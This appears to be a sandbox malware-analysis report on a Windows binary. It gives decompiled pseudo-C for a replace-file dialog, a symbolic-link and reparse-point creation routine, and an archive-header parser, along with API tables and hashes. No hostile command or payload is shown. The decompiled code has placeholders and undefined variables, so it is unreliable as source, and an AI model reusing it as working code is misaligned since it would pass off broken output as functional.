                • Opcode Fuzzy Hash: ed978ca703ede180ad8375e6b8144ad935ab68144a74a61df71860f61abfbe04
                • Instruction Fuzzy Hash: 04A01230195006468A000B30CC09D1D77515770702F00C6217102C00A0CB308C10A500
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00CBAFB9, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00CBAFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t151;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t159;
				intOrPtr _t162;
				void* _t163;
				int _t166;
				int _t169;
				void* _t173;
				void* _t177;
				void* _t179;

				_t156 = __edx;
				_t151 = __ecx;
				E00CBD940();
				_t148 = _a6748;
				_t162 = _a6744;
				_t159 = _a6740;
				if(E00CA12D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t163 = _t162 - 0x110;
					if(_t163 == 0) {
						SetFocus(GetDlgItem(_t159, 0x6c));
						E00CAFAB1( &_a2640, _a6752, 0x800);
						E00CABA19( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t159, 0x65,  &_a2616);
						 *0xcddf00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
						_t173 = FindFirstFileW( &_a2596,  &_a288);
						if(_t173 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t166 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00CA3E41( &_a900, 0x200, L"%s %s %s", E00CADA42(_t151, 0x99));
							_t179 = _t177 + 0x18;
							SetDlgItemTextW(_t159, 0x6a,  &_a900);
							FindClose(_t173);
							if((_a308 & 0x00000010) == 0) {
								_push(0x32);
								_push( &_a212);
								_push(0);
								_pop(0);
								asm("adc eax, ebp");
								_push(_a340);
								_push(0 + _a344);
								E00CB9D99();
								_push(E00CADA42(0 + _a344, 0x98));
								E00CA3E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t179 = _t179 + 0x14;
								SetDlgItemTextW(_t159, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
							_t152 =  *0xce75f4; // 0x0
							E00CB082F(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00CA3E41( &_a896, 0x200, L"%s %s %s", E00CADA42(_t152, 0x99));
							_t177 = _t179 + 0x18;
							SetDlgItemTextW(_t159, 0x6b,  &_a896);
							_t153 =  *0xcfce14;
							_t157 =  *0xcfce10;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00CB9D99(_t157, _t153,  &_a212, 0x32);
								_push(E00CADA42(_t153, 0x98));
								E00CA3E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t159, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t163 != 1) {
						goto L27;
					}
					_t169 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t169;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t169);
						L13:
						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xcddf4c(_t137);
						}
						EndDialog(_t159, _t169);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t169 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t169 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}




























                0x00cbafb9
                0x00cbafb9
                0x00cbafbe
                0x00cbafc4
                0x00cbafcd
                0x00cbafd7
                0x00cbaff6
                0x00cbb000
                0x00cbb006
                0x00cbb080
                0x00cbb09b
                0x00cbb0aa
                0x00cbb0c0
                0x00cbb0dd
                0x00cbb0f3
                0x00cbb10f
                0x00cbb114
                0x00cbb127
                0x00cbb137
                0x00cbb13d
                0x00cbb143
                0x00cbb144
                0x00cbb14a
                0x00cbb14d
                0x00cbb154
                0x00cbb172
                0x00cbb17c
                0x00cbb184
                0x00cbb1a2
                0x00cbb1a7
                0x00cbb1b5
                0x00cbb1b8
                0x00cbb1c6
                0x00cbb1c8
                0x00cbb1da
                0x00cbb1e2
                0x00cbb1e4
                0x00cbb1e5
                0x00cbb1e7
                0x00cbb1e8
                0x00cbb1e9
                0x00cbb1f8
                0x00cbb213
                0x00cbb218
                0x00cbb226
                0x00cbb226
                0x00cbb23c
                0x00cbb242
                0x00cbb24d
                0x00cbb25c
                0x00cbb26c
                0x00cbb286
                0x00cbb29e
                0x00cbb2a8
                0x00cbb2b0
                0x00cbb2cf
                0x00cbb2d4
                0x00cbb2e2
                0x00cbb2ec
                0x00cbb2f2
                0x00cbb2f8
                0x00cbb30c
                0x00cbb31b
                0x00cbb332
                0x00cbb337
                0x00cbb345
                0x00cbb345
                0x00cbb2f8
                0x00cbb347
                0x00cbb347
                0x00cbb349
                0x00cbb353
                0x00cbb353
                0x00cbb00b
                0x00000000
                0x00000000
                0x00cbb016
                0x00cbb017
                0x00cbb019
                0x00cbb03d
                0x00cbb03d
                0x00cbb03f
                0x00cbb03f
                0x00cbb040
                0x00cbb04a
                0x00cbb052
                0x00cbb055
                0x00cbb055
                0x00cbb05d
                0x00000000
                0x00cbb05d
                0x00cbb01b
                0x00cbb01e
                0x00cbb072
                0x00000000
                0x00cbb072
                0x00cbb020
                0x00cbb023
                0x00cbb06f
                0x00000000
                0x00cbb06f
                0x00cbb025
                0x00cbb028
                0x00cbb069
                0x00000000
                0x00cbb069
                0x00cbb02a
                0x00cbb02d
                0x00000000
                0x00000000
                0x00cbb02f
                0x00cbb032
                0x00cbb065
                0x00000000
                0x00cbb065
                0x00cbb037
                0x00000000
                0x00000000
                0x00000000
                0x00cbb037
                0x00cbaff8
                0x00cbaffa
                0x00000000

                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CBB04A
                • EndDialog.USER32(?,00000006), ref: 00CBB05D
                • GetDlgItem.USER32(?,0000006C), ref: 00CBB079
                • SetFocus.USER32(00000000), ref: 00CBB080
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CBB0C0
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CBB0F3
                • FindFirstFileW.KERNEL32(?,?), ref: 00CBB109
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CBB127
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBB137
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBB154
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBB172
                • _swprintf.LIBCMT ref: 00CBB1A2
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CBB1B5
                • FindClose.KERNEL32(00000000), ref: 00CBB1B8
                • _swprintf.LIBCMT ref: 00CBB213
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CBB226
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CBB23C
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CBB25C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBB26C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBB286
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBB29E
                • _swprintf.LIBCMT ref: 00CBB2CF
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CBB2E2
                • _swprintf.LIBCMT ref: 00CBB332
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CBB345
                  • Part of subcall function 00CB9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CB9DBF
                  • Part of subcall function 00CB9D99: GetNumberFormatW.KERNEL32 ref: 00CB9E0E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                • API String ID: 797121971-1840816070
                • Opcode ID: 736b343f4d12717c9899f53a7f2d059fdc389cc2d623b17c2bdec1d6a9b21ffe
                • Instruction ID: 9bc257b8e29a08b5842edd78b1ea1d6bd5a014d5e66de80d42cd9eff44898d65
                • Opcode Fuzzy Hash: 736b343f4d12717c9899f53a7f2d059fdc389cc2d623b17c2bdec1d6a9b21ffe
                • Instruction Fuzzy Hash: 3D91A4B2648349BBD231EBA0DD49FFF77ACEB89704F00481AB746D6081D771AA049762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA6FC6, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00CA6FC6(void* __edx) {
				void* __esi;
				signed int _t111;
				signed int _t113;
				void* _t116;
				int _t118;
				intOrPtr _t121;
				signed int _t139;
				int _t145;
				void* _t182;
				void* _t185;
				void* _t190;
				short _t191;
				void* _t197;
				void* _t202;
				void* _t203;
				void* _t222;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t226;
				void* _t228;
				WCHAR* _t229;
				intOrPtr _t233;
				short _t237;
				void* _t238;
				intOrPtr _t239;
				short _t241;
				void* _t242;
				void* _t244;
				void* _t245;

				_t223 = __edx;
				E00CBD870(E00CD126D, _t242);
				E00CBD940();
				 *((intOrPtr*)(_t242 - 0x18)) = 1;
				if( *0xce0043 == 0) {
					E00CA7A15(L"SeRestorePrivilege");
					E00CA7A15(L"SeCreateSymbolicLinkPrivilege");
					 *0xce0043 = 1;
				}
				_t199 = _t242 - 0x2c;
				E00CA6ED7(_t242 - 0x2c, 0x1418);
				_t197 =  *(_t242 + 0x10);
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				E00CAFAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
				 *((intOrPtr*)(_t242 - 0x10)) = E00CC2B33(_t242 - 0x107c);
				_t232 = _t242 - 0x107c;
				_t228 = _t242 - 0x207c;
				_t111 = E00CC4DA0(_t242 - 0x107c, L"\\??\\", 4);
				_t245 = _t244 + 0x10;
				asm("sbb al, al");
				_t113 =  ~_t111 + 1;
				 *(_t242 - 0x14) = _t113;
				if(_t113 != 0) {
					_t232 = _t242 - 0x1074;
					_t190 = E00CC4DA0(_t242 - 0x1074, L"UNC\\", 4);
					_t245 = _t245 + 0xc;
					if(_t190 == 0) {
						_t191 = 0x5c;
						 *((short*)(_t242 - 0x207c)) = _t191;
						_t228 = _t242 - 0x207a;
						_t232 = _t242 - 0x106e;
					}
				}
				E00CC4D7E(_t228, _t232);
				_t116 = E00CC2B33(_t242 - 0x207c);
				_t233 =  *((intOrPtr*)(_t242 + 8));
				_t229 =  *(_t242 + 0xc);
				 *(_t242 + 0x10) = _t116;
				if( *((char*)(_t233 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t229);
					E00CA9D3A(_t199, _t242);
					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
						_t118 = CreateDirectoryW(_t229, 0);
						__eflags = _t118;
						if(_t118 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 == 0xffffffff) {
							L27:
							 *((char*)(_t242 - 0x18)) = 0;
							L28:
							E00CA159C(_t242 - 0x2c);
							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
							return  *((intOrPtr*)(_t242 - 0x18));
						}
						CloseHandle(_t182);
						L14:
						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
						if(_t121 != 3) {
							__eflags = _t121 - 2;
							if(_t121 == 2) {
								L18:
								_t202 =  *(_t242 - 0x2c);
								_t224 =  *((intOrPtr*)(_t242 - 0x10));
								 *_t202 = 0xa000000c;
								_t237 = _t224 + _t224;
								 *((short*)(_t202 + 0xa)) = _t237;
								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
								 *((intOrPtr*)(_t202 + 6)) = 0;
								E00CC4D7E(_t202 + 0x14, _t242 - 0x107c);
								_t60 = _t237 + 2; // 0x3
								_t238 =  *(_t242 - 0x2c);
								 *((short*)(_t238 + 0xc)) = _t60;
								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
								E00CC4D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
								__eflags = _t139;
								 *(_t238 + 0x10) = _t139;
								L19:
								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t242 + 0x10) = _t203;
								if(_t203 == 0xffffffff) {
									goto L27;
								}
								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
								_t262 = _t145;
								if(_t145 != 0) {
									E00CA943C(_t242 - 0x30a0);
									 *(_t242 - 4) = 1;
									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
									_t239 =  *((intOrPtr*)(_t242 + 8));
									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00CA9A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
									E00CA94DA(_t242 - 0x30a0);
									__eflags =  *((char*)(_t239 + 0x61a0));
									if( *((char*)(_t239 + 0x61a0)) == 0) {
										E00CAA12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
									}
									E00CA946E(_t242 - 0x30a0);
									goto L28;
								}
								CloseHandle( *(_t242 + 0x10));
								E00CA6BF5(_t262, 0x15, 0, _t229);
								_t160 = GetLastError();
								if(_t160 == 5 || _t160 == 0x522) {
									if(E00CAFC98() == 0) {
										E00CA1567(_t242 - 0x7c, 0x18);
										_t160 = E00CB0A9F(_t242 - 0x7c);
									}
								}
								E00CBE214(_t160);
								E00CA6E03(0xce00e0, 9);
								_push(_t229);
								if( *((char*)(_t197 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t121 - 1;
							if(_t121 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t222 =  *(_t242 - 0x2c);
						_t226 =  *((intOrPtr*)(_t242 - 0x10));
						 *_t222 = 0xa0000003;
						_t241 = _t226 + _t226;
						 *((short*)(_t222 + 0xa)) = _t241;
						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
						 *((intOrPtr*)(_t222 + 6)) = 0;
						E00CC4D7E(_t222 + 0x10, _t242 - 0x107c);
						_t40 = _t241 + 2; // 0x3
						_t238 =  *(_t242 - 0x2c);
						 *((short*)(_t238 + 0xc)) = _t40;
						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
						E00CC4D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
						goto L19;
					}
				}
				if( *(_t242 - 0x14) != 0) {
					goto L27;
				}
				_t185 = E00CAB4F2(_t197 + 0x1104);
				_t255 = _t185;
				if(_t185 != 0) {
					goto L27;
				}
				_push(_t197 + 0x1104);
				_push(_t229);
				_push(_t197 + 0x28);
				_push(_t233);
				if(E00CA77F7(_t223, _t255) == 0) {
					goto L27;
				}
				goto L9;
			}
































                0x00ca6fc6
                0x00ca6fcb
                0x00ca6fd5
                0x00ca6fe7
                0x00ca6fea
                0x00ca6ff1
                0x00ca6ffb
                0x00ca7000
                0x00ca7000
                0x00ca700b
                0x00ca700e
                0x00ca7013
                0x00ca7016
                0x00ca702d
                0x00ca7040
                0x00ca7043
                0x00ca704b
                0x00ca7057
                0x00ca705c
                0x00ca7061
                0x00ca7063
                0x00ca7065
                0x00ca706a
                0x00ca706e
                0x00ca707c
                0x00ca7081
                0x00ca7086
                0x00ca708a
                0x00ca708b
                0x00ca7092
                0x00ca7098
                0x00ca7098
                0x00ca7086
                0x00ca70a0
                0x00ca70ac
                0x00ca70b1
                0x00ca70b7
                0x00ca70ba
                0x00ca70c4
                0x00ca70fe
                0x00ca7101
                0x00ca7102
                0x00ca7103
                0x00ca710f
                0x00ca7146
                0x00ca714c
                0x00ca714e
                0x00000000
                0x00000000
                0x00000000
                0x00ca711a
                0x00ca712b
                0x00ca7134
                0x00ca72f4
                0x00ca72f4
                0x00ca72f8
                0x00ca72fb
                0x00ca7309
                0x00ca7313
                0x00ca7313
                0x00ca713b
                0x00ca7154
                0x00ca7154
                0x00ca715d
                0x00ca71c5
                0x00ca71c8
                0x00ca71d2
                0x00ca71d2
                0x00ca71d5
                0x00ca71dd
                0x00ca71e3
                0x00ca71e6
                0x00ca71f1
                0x00ca71f7
                0x00ca7205
                0x00ca720a
                0x00ca720d
                0x00ca7210
                0x00ca7219
                0x00ca722e
                0x00ca723c
                0x00ca723c
                0x00ca723f
                0x00ca7242
                0x00ca725a
                0x00ca725c
                0x00ca7262
                0x00000000
                0x00000000
                0x00ca7280
                0x00ca7286
                0x00ca7288
                0x00ca7324
                0x00ca7335
                0x00ca7339
                0x00ca733c
                0x00ca7342
                0x00ca7356
                0x00ca7369
                0x00ca737c
                0x00ca7387
                0x00ca7392
                0x00ca7397
                0x00ca739e
                0x00ca73a4
                0x00ca73a4
                0x00ca73af
                0x00000000
                0x00ca73af
                0x00ca7292
                0x00ca729d
                0x00ca72a2
                0x00ca72ab
                0x00ca72bb
                0x00ca72c2
                0x00ca72ca
                0x00ca72ca
                0x00ca72bb
                0x00ca72d6
                0x00ca72df
                0x00ca72eb
                0x00ca72ec
                0x00ca7316
                0x00ca72ee
                0x00ca72ee
                0x00ca72ee
                0x00000000
                0x00ca72ec
                0x00ca71ca
                0x00ca71cc
                0x00000000
                0x00000000
                0x00000000
                0x00ca71cc
                0x00ca715f
                0x00ca7162
                0x00ca716a
                0x00ca7170
                0x00ca7173
                0x00ca717e
                0x00ca7184
                0x00ca7192
                0x00ca7197
                0x00ca719a
                0x00ca719d
                0x00ca71a6
                0x00ca71bb
                0x00000000
                0x00ca71c0
                0x00ca710f
                0x00ca70ca
                0x00000000
                0x00000000
                0x00ca70d7
                0x00ca70dc
                0x00ca70de
                0x00000000
                0x00000000
                0x00ca70ea
                0x00ca70eb
                0x00ca70ef
                0x00ca70f0
                0x00ca70f8
                0x00000000
                0x00000000
                0x00000000

                APIs
                • __EH_prolog.LIBCMT ref: 00CA6FCB
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00CA712B
                • CloseHandle.KERNEL32(00000000), ref: 00CA713B
                  • Part of subcall function 00CA7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7A24
                  • Part of subcall function 00CA7A15: GetLastError.KERNEL32 ref: 00CA7A6A
                  • Part of subcall function 00CA7A15: CloseHandle.KERNEL32(?), ref: 00CA7A79
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00CA7146
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CA7254
                • DeviceIoControl.KERNEL32 ref: 00CA7280
                • CloseHandle.KERNEL32(?), ref: 00CA7292
                • GetLastError.KERNEL32(00000015,00000000,?), ref: 00CA72A2
                • RemoveDirectoryW.KERNEL32(?), ref: 00CA72EE
                • DeleteFileW.KERNEL32(?), ref: 00CA7316
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3935142422-3508440684
                • Opcode ID: 97cff6fd28fb4c52561f9d1bd6324443bc0ff04d65f7b84bd1cbed490c24dc5a
                • Instruction ID: 5928bef6415d227626379a3c11a9f1744371702249822b31a1e2124eeb8d58d7
                • Opcode Fuzzy Hash: 97cff6fd28fb4c52561f9d1bd6324443bc0ff04d65f7b84bd1cbed490c24dc5a
                • Instruction Fuzzy Hash: 2BB1D2719042199BDF21DFA4CC41BEE77B8FF09308F0446AAF91AE7142D770AA45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA30FC, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 84%
                			E00CA30FC(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t378;
				void* _t380;
				void* _t381;
				void* _t392;
				intOrPtr* _t394;
				intOrPtr* _t396;
				signed int _t409;
				signed int _t419;
				char _t431;
				signed int _t432;
				signed int _t437;
				signed int _t441;
				intOrPtr _t449;
				unsigned int _t455;
				unsigned int _t458;
				signed int _t462;
				signed int _t470;
				signed int _t479;
				signed int _t484;
				signed int _t498;
				intOrPtr _t499;
				signed int _t500;
				signed char _t501;
				unsigned int _t502;
				void* _t509;
				void* _t517;
				signed int _t520;
				void* _t521;
				signed int _t531;
				unsigned int _t534;
				void* _t539;
				intOrPtr _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				intOrPtr _t556;

				_t396 = __ecx;
				_t546 = _t545 - 0x68;
				E00CBD870(E00CD11A9, _t544);
				E00CBD940();
				_t394 = _t396;
				E00CAC223(_t544 + 0x30, _t394);
				 *(_t544 + 0x60) = 0;
				 *((intOrPtr*)(_t544 - 4)) = 0;
				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t544 + 0x6a)) = 0;
					L16:
					if(E00CAC42E(_t498, 7) >= 7) {
						 *(_t394 + 0x21f4) = 0;
						_t509 = _t394 + 0x21e4;
						 *_t509 = E00CAC29E(_t544 + 0x30);
						_t531 = E00CAC40A(_t544 + 0x30, 4);
						_t242 = E00CAC39E(_t498);
						__eflags = _t242 | _t498;
						if((_t242 | _t498) == 0) {
							L85:
							E00CA1EF8(_t394);
							L86:
							E00CA159C(_t544 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
							return  *(_t544 + 0x60);
						}
						__eflags = _t531;
						if(_t531 == 0) {
							goto L85;
						}
						_t42 = _t531 - 3; // -3
						_t534 = _t531 + 4 + _t242;
						_t409 = _t42 + _t242;
						__eflags = _t409;
						 *(_t544 + 0x64) = _t534;
						if(_t409 < 0) {
							goto L85;
						}
						__eflags = _t534 - 7;
						if(_t534 < 7) {
							goto L85;
						}
						E00CAC42E(_t498, _t409);
						__eflags =  *(_t544 + 0x48) - _t534;
						if( *(_t544 + 0x48) < _t534) {
							goto L17;
						}
						_t248 = E00CAC37E(_t544 + 0x30);
						 *(_t394 + 0x21e8) = E00CAC39E(_t498);
						_t250 = E00CAC39E(_t498);
						 *(_t394 + 0x21ec) = _t250;
						__eflags =  *_t509 - _t248;
						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
						_t254 =  *(_t394 + 0x21e8);
						 *(_t394 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
						 *(_t544 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
							 *(_t544 + 0x58) = 0;
							 *(_t544 + 0x54) = 0;
							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
								_t536 = _t256;
								 *(_t544 + 0x64) = _t256;
								 *(_t544 + 0x5c) = _t256;
								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E00CAC39E(_t498);
									_t536 = _t362;
									 *(_t544 + 0x64) = _t362;
									 *(_t544 + 0x5c) = _t498;
								}
								_t257 = E00CA1901(_t394,  *(_t394 + 0x21f0));
								_t499 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t394 + 0x6ca8)) = E00CA3CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
								_t500 =  *(_t394 + 0x21e8);
								__eflags = _t500 - 1;
								if(__eflags == 0) {
									E00CAA96C(_t394 + 0x2208);
									_t419 = 5;
									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
									_t501 = E00CAC39E(_t500);
									 *(_t394 + 0x6cb5) = _t501 & 1;
									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
									_t431 = 1;
									 *((char*)(_t394 + 0x6cba)) = 1;
									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t394 + 0x6cb8)) = 0;
									__eflags = _t501 & 0x00000002;
									if((_t501 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = E00CAC39E(_t501);
										_t270 = 0;
										_t431 = 1;
									}
									__eflags =  *(_t394 + 0x6cb5);
									if( *(_t394 + 0x6cb5) == 0) {
										L81:
										_t431 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t394 + 0x6cb9)) = _t431;
											_t432 =  *(_t544 + 0x58);
											__eflags = _t432 |  *(_t544 + 0x54);
